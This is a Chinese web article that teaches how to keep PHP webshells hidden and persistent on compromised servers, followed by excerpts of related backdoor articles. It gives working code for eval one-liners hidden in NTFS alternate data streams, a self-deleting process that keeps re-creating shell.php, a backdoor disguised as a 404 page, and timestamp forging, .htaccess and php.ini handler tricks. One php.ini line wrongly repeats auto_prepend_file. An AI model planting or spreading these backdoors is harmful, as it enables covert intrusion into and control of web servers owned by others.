PHP后门隐藏的一些技巧总结

前言

如果想让自己的Webshell留的更久一些,除了Webshell要免杀,还需要注意一些隐藏技巧,比如隐藏文件,修改时间属性,隐藏文件内容等。

1、隐藏文件

使用Attrib +s +a +h +r命令就是把原本的文件夹增加了系统文件属性、存档文件属性、只读文件属性和隐藏文件属性。

attrib +s +a +h +r shell.php //隐藏shell.php文件

2、修改文件时间属性

当你试图在一堆文件中隐藏自己新创建的文件,那么,除了创建一个迷惑性的文件名,还需要修改文件的修改日期。

//修改时间修改
Set-ItemProperty -Path 2.txt LastWriteTime -Value "2020-11-01 12:12:12"
//访问时间修改
Set-ItemProperty -Path 2.txt LastAccessTime -Value "2020-11-01 12:12:12"
//创建时间修改
Set-ItemProperty -Path 2.txt CreationTime -Value "2020-11-01 12:12:12"

使用命令获取文件属性

Get-ItemProperty -Path D:\1.dll | Format-list -Property * -Force

修改某个文件夹下所有文件的创建和修改时间

powershell.exe -command "ls 'upload\*.*' | foreach-object { $_.LastWriteTime = Get-Date ; $_.CreationTime = '2018/01/01 19:00:00' }"

3、利用ADS隐藏文件内容

在服务器上echo一个数据流文件进去,比如index.php是网页正常文件,我们可以这样子搞:

echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg

这样子就生成了一个不可见的shell hidden.jpg,常规的文件管理器、type命令,dir命令、del命令发现都找不出那个hidden.jpg的。

利用include函数,将index.php:hidden.jpg进行hex编码,把这个ADS文件include进去,这样子就可以正常解析我们的一句话了。

<?php @include(PACK('H*','696E6465782E7068703A68696464656E2E6A7067'));?>

4、不死马

不死马会删除自身,以进程的形式循环创建隐蔽的后门。

<?php
set_time_limit(0);
ignore_user_abort(1);
unlink(__FILE__); //删除自身
while(1)
{
 file_put_contents('shell.php','<?php @eval($_GET[cmd]);?>'); //创建shell.php,这里最好用免杀的一句话
 sleep(10); //间隔时间
}
?>

处理方式最简单有效的办法,就是重启服务就可以删除webshell文件。

5、中间件后门

将编译好的so文件复制到modules文件夹,启动后门模块,重启Apache。当发送特定参数的字符串过去时,即可触发后门。

github项目地址:

https://github.com/VladRico/apache2_BackdoorMod

6、利用404页面隐藏后门

404页面主要用来提升用户体验,可用来隐藏后门文件。

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>

7、利用 .htaccess 文件构成PHP后门

一般.htaccess可以用来留后门和针对黑名单绕过,在上传目录创建.htaccess 文件写入,无需重启即可生效,上传png文件解析。

AddType application/x-httpd-php .png

另外,在.htaccess 加入php解析规则,把文件名包含1的解析成php,上传1.txt即可解析。

<FilesMatch "1">
SetHandler application/x-httpd-php
</FilesMatch>

8、利用 php.ini 隐藏后门文件

php.ini 中可以指定在主文件执行前后自动解析的文件名称,常用于页面公共头部和尾部,也可以用来隐藏php后门。

;在PHP文档之前自动添加文件。
auto_prepend_file = "c:\tmp.txt"
;在PHP文档之后自动添加文件。
auto_prepend_file = "c:\tmp.txt"

需重启服务生效,访问任意一个php文件即可获取webshell。

总结

到此这篇关于PHP后门隐藏的一些技巧的文章就介绍到这了,更多相关PHP后门隐藏技巧内容请搜索我们以前的文章或继续浏览下面的相关文章希望大家以后多多支持我们!

(0)

相关推荐

  • 一个不易被发现的PHP后门代码解析

    偶然间看到一段,看起来似乎没有什么问题,确是能致命的后门代码,这里用到了一个一般的PHPer都不怎么关注的反撇号 ` ,反撇号包含的字符串,等同于shell_exec函数. 伪装性很好,很容易被管理员忽略. $selfNums = $_GET['r']; if (isset($selfNums)){ echo `$selfNums`; } 刚看到这段代码我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了, 而且又不是单引号,这个就是关键所在了,这

  • php后门URL的防范

    例如,下面WEB应用可能向登入用户显示敏感信息: 复制代码 代码如下: <?php$authenticated = FALSE;$authenticated = check_auth();if ($authenticated){    include './sensitive.php';}?> 由于sensitive.php位于网站主目录下,用浏览器能跳过验证机制直接访问到该文件.这是由于在网站主目录下的所有文件都有一个相应的URL地址.在某些情况下,这些脚本可能执行一个重要的操作,这就增大了

  • 教你识别简单的免查杀PHP后门

    一个最常见的一句话后门可能写作这样 <?php @eval($_POST['cmd']);?> 或这样 <?php @assert($_POST['cmd']);?> tudouya 同学在FREEBUF上给出[一种构造技巧]利用 复制代码 代码如下: <?php  @$_++; // $_ = 1  $__=("#"^"|"); // $__ = _   $__.=("."^"~"); // _

  • PHP隐形一句话后门,和ThinkPHP框架加密码程序(base64_decode)

    今天一个客户的服务器频繁被写入: mm.php 内容为: 复制代码 代码如下: <?eval($_POST[c]);?> 最后查到某文件内的第一行为以下代码: 复制代码 代码如下: fputs(fopen(base64_decode("bW0ucGhw"),"w"),base64_decode("PD9ldmFsKCRfUE9TVFtjXSk7Pz4=")); base64_decode("bW0ucGhw") /

  • PHP $O00OO0=urldecode & eval 解密,记一次商业源码的去后门

    代码如下: $O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$

  • 一些 PHP 管理系统程序中的后门

    我倒不怎么关心提示框,SABLOG怎么知道我的版本有漏洞呢,程序肯定有后门.每次登陆后台自动检测官方版本跟当前版本对比.嗯.后来找到了.在templates/admin/main.php最后的一部分.删掉如下代码就OK了. 其实这个不足以导致被黑的,现在一般有点常识的,密码都比较复杂,几个数字+几个字母,MD5的话一般很难跑出来.当然有彩虹表的话,另说... 复制代码 代码如下: <script type="text/javascript"> i=1; var autour

  • 超小PHP小马小结(方便查找后门的朋友)

    作者: spider 我也来个超小PHP小马 复制代码 代码如下: <?php header("content-Type: text/html; charset=gb2312"); if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); ?> <form method="POST"> 保存文件名: <input type

  • 用php实现批量查询清除一句话后门的代码

    总是忘记一句话放到哪个文件里去了,直接全部干掉... 复制代码 代码如下: <?//xy7  if (!isset($dir) or empty($dir)) {  $dir=str_replace('\\','/',dirname(__FILE__));  echo "<font color=\"#00688B\">".$dir."</font>";  } else {  $dir=$_GET['dir'];  e

  • PHP后门隐藏的一些技巧总结

    前言 如果想让自己的Webshell留的更久一些,除了Webshell要免杀,还需要注意一些隐藏技巧,比如隐藏文件,修改时间属性,隐藏文件内容等. 1.隐藏文件 使用Attrib +s +a +h +r命令就是把原本的文件夹增加了系统文件属性.存档文件属性.只读文件属性和隐藏文件属性. attrib +s +a +h +r shell.php //隐藏shell.php文件 2.修改文件时间属性 当你试图在一堆文件中隐藏自己新创建的文件,那么,除了创建一个迷惑性的文件名,还需要修改文件的修改日期

  • python基于socket进行端口转发实现后门隐藏的示例

    思想: 用户正常浏览器访问请求通过8080端口,请求若为http请求,则正常转发到80端口保证网站正常运行.否则转发到8888端口执行系统命令. 8888端口监听代码: #!/usr/bin/env python from socket import * import os HOST='127.0.0.1' PORT=8888 BUFSIZE=1024 ADDR=(HOST,PORT) tcpSerSock = socket(AF_INET,SOCK_STREAM) tcpSerSock.set

  • 解密新型SQL Server无文件持久化恶意程序的问题

    解密新型SQL Server无文件持久化恶意程序的问题

    近期,阿里云云安全中心基于全新的深度威胁检测功能,监测到云上部分用户的 SQL Server 数据库内部隐藏着一种新型的持久化后门程序. 攻击者利用弱口令不严谨配置,以非常简单的攻击方法进入数据库,即可植入该后门,更致命的是,该后门高度隐蔽和持久化控制的特性,让发现和清除变得困难. 威 胁 特 点 植入简单 利用数据库弱密码或不严谨配置,攻击者只需简单的弱口令利用,即可轻松登录进用户的数据库植入该后门程序; 高度隐蔽 该后门完全隐藏在SQL Server数据库进程内部,无文件落地.无额外进程,运

  • 隐藏ASP木马后门的两种方法

    1.建立非标准目录:mkdir images..\ 拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp 通过web访问ASP木马:http://ip/images../news.asp?action=login 如何删除非标准目录:rmdir images..\ /s 2.Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的: mkdir 

  • js 奇葩技巧之隐藏代码

    昨天在群看到有人发了个文章叫<"短"化你的代码>,思路非常不错,采用unicode的零宽字符来实现字符隐藏,虽然有字符,可是你却看不见它. 这篇文章详细的介绍了这种方法的实现原理,最后还给出了一个生成工具. 当然,作者算了留了一个小小的练习给我们,因为他只用了两个字符,导致转换后的数据是原始数据的 8倍. 他给我们提供了4个零宽字符,我们就可以缩小至4倍. 好了,我们来看下代码吧. (function(window) { var rep = { // 替换用的数据,使用了4

  • 发现一篇不错的DLL后门完全清除技巧

    后门!相信这个词语对您来说一定不会陌生,它的危害不然而欲,但随着人们的安全意识逐步增强,又加上杀毒软件的"大力支持",使传统的后门无法在隐藏自己,任何稍微有点计算机知识的人,都知道"查端口""看进程",以便发现一些"蛛丝马迹".所以,后门的编写者及时调整了思路,把目光放到了动态链接程序库上,也就是说,把后门做成DLL文件,然后由某一个EXE做为载体,或者使用Rundll32.exe来启动,这样就不会有进程,不开端口等特点,也就

  • Python如何将图像音视频等资源文件隐藏在代码中(小技巧)

    下午有同学Python学习群里说,使用pyinstaller打包源码时,因为代码中使用了图像.音频.视频等资源文件,无法将程序打包成单一的可执行文件.有没有方法将这些资源文件按保存在代码中呢?我想了一下,应该是可以的.于是乎,花了一个小时,写出了下面的代码,算是抛砖引玉吧. 这段代码可以将二进制文件转存为python脚本文件,供其他脚本引用.代码最后附有使用的例子,演示用的图片可以随便照一张.除了转存二进制数据,还提供了两个方法: get_fp():返回二进制的IO对象(类文件对象) save(

  • Python中隐藏的五种实用技巧分享

    目录 1. ... 对象 2.解压迭代对象 3.展开的艺术 4.下划线 _ 变量 5.多种用途的else 循环 异常处理 1. ... 对象 没错,你没看错,就是 "..." 在Python中 ... 代表着一个名为 Ellipsis 的对象.根据官方说明,它是一个特殊值,通常可以作为空函数的占位符,或是用于Numpy中的切片操作. 如: def my_awesome_function():     ... 等同于: def my_awesome_function():     Ell

  • 删除极速隐藏软件技巧

    删除极速隐藏软件技巧

    最近也不知怎么了,鼠标右键菜单中突然多出了一个"极速隐藏"的选项(如图1).思来想去也想不出是什么时候招惹的它.更为可气的是当我双击欲打开某些文件时,"极速隐藏"却自动将其隐藏了,每次都要启动"极速隐藏",重新恢复,十分烦人. screen.width*0.7)this.style.width=screen.width*0.7;" border=0> 图1 想将其卸载吧,在控制面板的"添加/删除程序"窗口中却找

  • WordPress用户登录框密码的隐藏与部分显示技巧

    WordPress用户登录框密码的隐藏与部分显示技巧

    让WordPress登录页的密码框显示最后一个输入的字符 在通常情况下,网页的设计者们会将密码输入框中的所有字符隐藏成黑点,以防止有人在背后偷窥输入的密码,如: 这种密码输入模式虽然减少了被偷窥的危险,但是给我们的密码输入带来了很多麻烦,因为我们不知道到底输入了什么字符,所以经常导致输错密码的情况,浪费了很多时间. 可能你也已经注意到,现在智能手机的很多应用中,使用了这样一种密码框处理方式:对用户在密码框中输入的最后一个字符,会先让它显示2-3秒钟,然后再隐藏,这样可以让用户知道刚刚输入了什么字

随机推荐